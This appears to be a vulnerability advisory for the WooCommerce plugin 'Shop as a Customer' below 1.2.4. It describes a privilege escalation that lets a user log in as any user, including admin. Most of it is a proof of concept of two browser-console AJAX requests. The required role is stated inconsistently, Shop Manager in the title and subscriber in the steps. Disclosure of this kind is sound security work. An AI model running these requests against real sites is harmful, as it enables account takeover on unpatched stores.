Shop as a Customer for WooCommerce < 1.2.4 – Shop Manager+ Privilege Escalation

Description

The plugin allows privileged users, such as WooCommerce Shop Managers, to be logged in as any user, such as admin

Proof of Concept

Run either of the below commands in the developer console of the web browser while being on the blog as a subscriber user and on the my account page. Replace USER_ID with the ID of the user to log as. Refresh the page to see that you are logged in as the given user.

jQuery.ajax({
    url: ajaxurl,
    type: 'POST',
    dataType: 'json',
    data: {
        action: 'vieworder',
        security: ajax_nonce,
        id: USER_ID
    },
    success: function(response) {
        console.log('Success:', response);
    },
    error: function(jqXHR, textStatus, errorThrown) {
        console.error('Error:', textStatus, errorThrown);
    }
});

jQuery.ajax({
    url: ajaxurl,
    type: 'POST',
    dataType: 'json',
    data: {
        action: 'ajaxxx',
        security: ajax_nonce,
        id: USER_ID
    },
    success: function(response) {
        console.log('Success:', response);
    },
    error: function(jqXHR, textStatus, errorThrown) {
        console.error('Error:', textStatus, errorThrown);
    }
});